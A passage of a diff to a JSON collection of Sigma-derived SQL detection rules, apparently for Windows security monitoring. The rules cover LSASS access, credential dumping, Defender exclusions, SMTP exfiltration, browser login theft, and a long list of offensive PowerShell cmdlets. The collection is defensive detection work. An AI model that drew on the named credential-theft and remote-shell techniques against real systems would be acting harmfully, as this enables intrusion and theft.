'%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_proc_access_lsass.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Potential NT API Stub Patching", - "id": "b916cba1-b38a-42da-9223-17114d846fd6", - "status": "experimental", - "description": "Detects potential NT API stub patching as seen used by the project PatchingAPI", - "author": "frack113", + "title": "Malicious PowerShell Commandlets - ScriptBlock", + "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess = '0x1FFFFF' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR TargetImage LIKE 
'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\GitHubDesktop.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\resources\\\\app\\\\git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND SourceImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\taskhost.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND TargetImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\regsvr32.exe' ESCAPE '\\') OR (SourceImage LIKE 
'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADR%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRExcel%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRHTML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRJSON%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRXML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADIDNS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE 
'\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_access_win_invoke_patchingapi.yml" + "filename": "posh_ps_malicious_commandlets.yml" }, { - "title": "Credential Dumping by LaZagne", - "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", - "status": "stable", - "description": "Detects LSASS process access by LaZagne for credential dumping.", - "author": "Bhabesh Raj, Jonhnathan Ribeiro", + 
"title": "Powershell Exfiltration Over SMTP", + "id": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", + "status": "experimental", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0349" + "attack.exfiltration", + "attack.t1048.003" + ], + "falsepositives": [ + "Legitimate script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Send-MailMessage%' ESCAPE '\\' AND NOT (ScriptBlockText LIKE '%CmdletsToExport%' ESCAPE '\\'))" ], + "filename": "posh_ps_send_mailmessage.yml" + }, + { + "title": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script", + "id": "df69cb1d-b891-4cd9-90c7-d617d90100ce", + "status": "experimental", + "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. 
This technique is often used as a method to load malicious content into memory afterward.", + "author": "frack113", "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%FromBase64String%' ESCAPE '\\' AND ScriptBlockText LIKE '%MemoryStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%H4sI%' ESCAPE '\\')" ], - "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" + "filename": "posh_ps_frombase64string_archive.yml" }, { - "title": "Windows Defender Exclusions Added - PowerShell", - "id": "c1344fa2-323b-4d2e-9176-84b4d4821c88", + "title": "Potential Active Directory Enumeration Using AD Module - PsScript", + "id": "9e620995-f2d8-4630-8430-4afd89f77604", "status": "experimental", - "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", - "author": "Tim Rauch", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. 
Which is often used by attackers to perform AD enumeration.", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562", - "attack.execution", - "attack.t1059" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -ExclusionPath %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionExtension %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionProcess %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionIpAddress %' ESCAPE '\\') AND (ScriptBlockText LIKE '%Add-MpPreference %' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MpPreference %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Import-Module %' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\') OR ScriptBlockText LIKE '%ipmo Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\'))" ], - "filename": "posh_ps_win_defender_exclusions_added.yml" + "filename": "posh_ps_active_directory_module_dll_import.yml" }, { - "title": "Extracting Information with PowerShell", - "id": "bd5971a7-626d-46ab-8176-ed643f694f68", + "title": "Access to Browser Login Data", + "id": "fc028194-969d-4122-8abe-0470d5b8f12f", "status": "test", - "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", + 
"description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1552.001" + "attack.t1555.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%ls%' ESCAPE '\\' AND ScriptBlockText LIKE '% -R%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-string %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Pattern %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Opera Software\\\\Opera Stable\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\Default%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data For Account%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_extracting.yml" + "filename": "posh_ps_access_to_browser_login_data.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", - "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "title": "PowerShell WMI Win32_Product Install MSI", + "id": "91109523-17f0-4248-a800-f81d9e7c081d", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - 
"author": "Jonathan Cheong, oscd.community", + "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-CimMethod %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName %' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Product %' ESCAPE '\\' AND ScriptBlockText LIKE '%-MethodName %' ESCAPE '\\' AND ScriptBlockText LIKE '%.msi%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_stdin.yml" + "filename": "posh_ps_win32_product_install_msi.yml" }, { "title": "PowerShell Remote Session Creation", 
@@ -5632,15 +5489,28 @@ "filename": "posh_ps_remote_session_creation.yml" }, { - "title": "PowerShell ShellCode", - "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "title": "Potential In-Memory Execution Using Reflection.Assembly", + "id": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", + "status": "experimental", + "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", + "author": "frack113", + "falsepositives": [ + "Legitimate use of the library" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Reflection.Assembly]::load%' ESCAPE '\\')" + ], + "filename": "posh_ps_dotnet_assembly_from_file.yml" + }, + { + "title": "PowerShell Credential Prompt", + "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", "status": "test", - "description": "Detects Base64 encoded Shellcode", - "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", + "description": "Detects PowerShell calling a credential prompt", + "author": "John Lambert (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", + "attack.credential_access", "attack.execution", "attack.t1059.001" ], 
